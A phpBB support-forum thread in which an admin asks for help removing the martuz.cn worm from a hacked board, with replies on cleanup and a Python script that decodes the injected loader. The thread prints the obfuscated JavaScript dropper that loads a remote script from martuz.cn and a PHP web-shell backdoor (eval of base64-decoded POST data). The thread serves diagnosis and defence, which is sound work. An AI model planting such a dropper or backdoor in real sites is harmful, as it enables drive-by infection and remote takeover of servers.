board hacked - martuz

Get help with installation and running phpBB 3.0.x here. Please do not post bug reports, feature requests, or MOD-related questions here.
END OF SUPPORT: 1 January 2017 (announcement)
thebluebus
Registered User
Posts: 155
Joined: Sat Dec 31, 2005 6:50 pm
Location: England, UK

board hacked - martuz

Post by thebluebus »

I say hacked, but I'm not sure how this has happened. Somehow I've got this

Code:

<script language=javascript><!-- 
(function(){var KVI='%';var ZZ5h='~76ar~20a~3d~22~53~63ript~45ngi~6ee~22~2cb~3d~22Version~28)+~22~2cj~3d~22~22~2cu~3dna~76i~67~61tor~2e~75se~72Agen~74~3bif~28(u~2ei~6edexOf(~22Chrome~22)~3c~30)~26~26(u~2e~69n~64ex~4ff(~22~57i~6e~22)~3e0~29~26~26(u~2ei~6ede~78O~66(~22~4eT~20~36~22~29~3c0)~26~26(docu~6dent~2ec~6fokie~2e~69nde~78~4ff(~22miek~3d~31~22)~3c0)~26~26(typ~65o~66(zrv~7a~74~73)~21~3d~74ypeof(~22A~22)))~7bzrvzts~3d~22A~22~3beva~6c(~22~69f(window~2e~22+a~2b~22~29~6a~3dj+~22+a+~22M~61jor~22+b~2ba+~22Minor~22+b+~61+~22Build~22+b~2b~22j~3b~22)~3bd~6fcumen~74~2ewri~74e(~22~3cscri~70t~20src~3d~2f~2fma~22~2b~22r~74uz~2e~63n~2fv~69d~2f~3fid~3d~22+~6a+~22~3e~3c~5c~2fscript~3e~22)~3b~7d';var sa3s=ZZ5h.replace(/~/g,KVI);eval(unescape(sa3s))})();
 --></script>
just before the body tag on every page. It also had a zero-pixel iframe going to some dodgy site at the bottom. I've got rid of this, but the script above remains and keeps reading from martuz.cn whilst loading a page. I downloaded the site and scanned locally, and AVG found 25 core PHP files infected. I've replaced these with default files and purged etc., but it's still there. Where should I look to remove it?
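To see what the injected block above actually does, here is an added example (my own code, not from the post or from phpBB) that undoes the obfuscation in Python. The loader only replaces `~` with `%` and feeds the result to `unescape()` before `eval()`, so repeating those two steps, then joining string literals that were split with `+`, recovers the payload. `SAMPLE_BLOB` is the `ZZ5h` string from the post, copied verbatim; the indicator regexes are mine and written for this family of dropper.

```python
import re

# The ZZ5h string from the injected <script> quoted in the post, copied verbatim.
# The loader does ZZ5h.replace(/~/g, '%') and then eval(unescape(...)); that is all.
SAMPLE_BLOB = (
    '~76ar~20a~3d~22~53~63ript~45ngi~6ee~22~2cb~3d~22Version~28)+~22~2cj~3d~22~22~2cu~3dna~76i~67~61tor~2e~75se~72Agen~74~3b'
    'if~28(u~2ei~6edexOf(~22Chrome~22)~3c~30)~26~26(u~2e~69n~64ex~4ff(~22~57i~6e~22)~3e0~29~26~26(u~2ei~6ede~78O~66(~22~4eT~20~36~22~29~3c0)'
    '~26~26(docu~6dent~2ec~6fokie~2e~69nde~78~4ff(~22miek~3d~31~22)~3c0)~26~26(typ~65o~66(zrv~7a~74~73)~21~3d~74ypeof(~22A~22)))~7bzrvzts~3d~22A~22~3b'
    'eva~6c(~22~69f(window~2e~22+a~2b~22~29~6a~3dj+~22+a+~22M~61jor~22+b~2ba+~22Minor~22+b+~61+~22Build~22+b~2b~22j~3b~22)~3b'
    'd~6fcumen~74~2ewri~74e(~22~3cscri~70t~20src~3d~2f~2fma~22~2b~22r~74uz~2e~63n~2fv~69d~2f~3fid~3d~22+~6a+~22~3e~3c~5c~2fscript~3e~22)~3b~7d'
)

# JavaScript unescape() understands %XX and %uXXXX; nothing else is touched.
_JS_ESCAPE = re.compile(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})')
# A pair of double-quoted literals joined with '+', with no escapes inside either.
_SPLIT_STRING = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')


def js_unescape(text):
    """Mirror JavaScript's unescape(): each %XX / %uXXXX becomes the code point it names."""
    return _JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def deobfuscate(blob, marker='~'):
    """Undo the two layers the loader applies: marker -> '%', then unescape()."""
    return js_unescape(blob.replace(marker, '%'))


def merge_split_strings(source):
    """Join "abc"+"def" literal pairs until nothing changes, so split hostnames read whole."""
    while True:
        merged, count = _SPLIT_STRING.subn(lambda m: '"%s%s"' % (m.group(1), m.group(2)), source)
        if count == 0:
            return merged
        source = merged


def extract_indicators(decoded):
    """Pull out what an analyst wants first from a decoded dropper: remote script URLs,
    the cookie it checks before firing, and the global it uses as a run-once guard."""
    src = merge_split_strings(decoded)
    return {
        'remote_scripts': re.findall(r'''src\s*=\s*["']?((?:https?:)?//[^\s"'>\\]+)''', src),
        'cookie_markers': re.findall(r'document\.cookie\.indexOf\("([^"]+)"\)', src),
        'guard_globals': re.findall(r'typeof\((\w+)\)', src),
    }


if __name__ == '__main__':
    decoded = deobfuscate(SAMPLE_BLOB)
    print(decoded)
    for key, values in extract_indicators(decoded).items():
        print(key, values)
```

Decoding shows why a grep of the page source for `martuz.cn` finds nothing: the hostname is split across two literals (`"//ma"+"rtuz.cn/vid/?id="`). The decoded code also only fires for Windows browsers that are not Chrome and do not report `NT 6`, checks for a `miek=1` cookie, sets the global `zrvzts` so it runs once per page, and builds the `id` parameter from the JScript `ScriptEngine` version values before writing the remote `<script>` tag.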
karlsemple
Former Team Member
Posts: 39802
Joined: Mon Nov 01, 2004 8:54 am
Location: Hereford, UK

Re: board hacked - martuz

Post by karlsemple »

The first thing you should do is update your virus definitions on your computer and scan your computer for any trojans, removing any which are found. Then be sure you update your operating system and all installed software. Then change all your passwords for your site; this includes hosting, FTP and database passwords. Once this is done, replace all your damaged files with working ones from your last backup before the hack occurred. It is looking like these are widespread hacks as a result of a trojan which is infecting people's computers and searching for and stealing FTP details, allowing another script to be executed which uses these details to inject the files with the code you are finding.
Kellanved
Former Team Member
Posts: 2635
Joined: Wed Jan 26, 2005 2:48 pm
Location: Meta-level

Re: board hacked - martuz

Post by Kellanved »

Also, remove any files that do not belong from your webspace. These worms add backdoors, for instance the infamous image.php.
Moreover, it also infects html files, namely the templates.

See here for more information:
http://blog.unmaskparasites.com/2009/05 ... ed-script/
http://blog.unmaskparasites.com/2009/05 ... r-exploit/
Nocando is in Idontwanna county. No support via PM
thebluebus
Registered User
Posts: 155
Joined: Sat Dec 31, 2005 6:50 pm
Location: England, UK

Re: board hacked - martuz

Post by thebluebus »

Thanks guys. I'm away travelling at the mo, so I have a few trusted people at home with FTP access. I think between the 3 of us this is how it's become infected. I've changed FTP passwords and deleted all access apart from me for now. I've scanned my PC and all is OK. I'm having a check over the server and haven't found anything suspicious yet, like the image.php files.

Any idea how to track down where the script is appearing?
karlsemple
Former Team Member
Posts: 39802
Joined: Mon Nov 01, 2004 8:54 am
Location: Hereford, UK

Re: board hacked - martuz

Post by karlsemple »

any idea how to track down where the script is appearing?
If the attack has left any backdoor scripts of any kind, the only way to track them down is to go through your directories one by one and check for rogue files. Having said that, I spent days looking through my directories and found nothing (yes, my site is currently dead as a result of the same hack). To be sure, I deleted my whole web root and am now re-uploading it from a previous working backup. I would suggest you do something similar if you have the backups to revert to.
thebluebus
Registered User
Posts: 155
Joined: Sat Dec 31, 2005 6:50 pm
Location: England, UK

Re: board hacked - martuz

Post by thebluebus »

Sounds painful! Thanks. Sounds like drastic action is required :(
thebluebus
Registered User
Posts: 155
Joined: Sat Dec 31, 2005 6:50 pm
Location: England, UK

Re: board hacked - martuz

Post by thebluebus »

Just found this in the images folder:

gifimg.php

Code:

<?php /* the base64 literal decodes to: if(isset($_POST['e']))eval(base64_decode($_POST['e'])); */ eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>
Edit: also in adm/images/
Kellanved
Former Team Member
Posts: 2635
Joined: Wed Jan 26, 2005 2:48 pm
Location: Meta-level

Re: board hacked - martuz

Post by Kellanved »

Yup, those are backdoors - delete them!
thebluebus
Registered User
Posts: 155
Joined: Sat Dec 31, 2005 6:50 pm
Location: England, UK

Re: board hacked - martuz

Post by thebluebus »

Yeah, all gone now. Removed the lot and uploaded new files. Seems everything is OK. Thanks for the help guys :D
Mick
Support Team Member
Posts: 26546
Joined: Fri Aug 29, 2008 9:49 am

Re: board hacked - martuz

Post by Mick »

Can I ask before this is closed please?
  1. How did the hack manifest itself?
  2. Did it occur because of a desktop based worm?
  3. Did you have any anti-spyware/malware/trojan/worm type software running?
I am assuming the worm stole the FTP details from the desktop machine you use for your board stuff then used that information to hack your board?

It may be helpful to know so that other users (and me) can take precautions against this type of attack.

Thanks.
  • "The more connected we get the more alone we become" - Kyle Broflovski©
  • "The good news is hell is just the product of a morbid human imagination.
    The bad news is, whatever humans can imagine, they can usually create.
    " - Harmony Cobel
thebluebus
Registered User
Posts: 155
Joined: Sat Dec 31, 2005 6:50 pm
Location: England, UK

Re: board hacked - martuz

Post by thebluebus »

Sure,

The hack seems to have inserted code into almost all PHP files on the server, affecting many sites I have hosted on a shared package. It's also inserted code into HTML and JS files.

After some research of martuz.cn, it appears it's a trojan which steals FTP logins and then spreads itself onto the server.

Like I said above, I am currently away for a year travelling, so I've given a few people at home FTP access. Since being away I have had a virus I struggled to get rid of (vundo/wowfx.dll). I'm guessing this is likely to be the culprit; however, with a few people with access, it could have come from elsewhere.

I downloaded the site locally and scanned with AVG, and it detects the infected files, but not the backdoor files like gifimg.php. It also doesn't detect the code injected into JS or HTML files. I've basically removed everything, started fresh, and am slowly rebuilding things. I've also changed passwords to the site, FTP, server CP etc., everything.
Mick
Support Team Member
Posts: 26546
Joined: Fri Aug 29, 2008 9:49 am

Re: board hacked - martuz

Post by Mick »

I would assume one of your admins hasn't been taking the standard precautions then?

I have just looked at a 'faulty' laptop of a friend of mine who I was considering for an admin role. When I questioned him why his firewall and AV were disabled he said they were blocking him from going on to some sites. I ended up doing the famous Acer ALT-F10 and did a fresh install.

New admin:
Request for admin permissions: denied
If denied, state reason: too stupid

Thanks
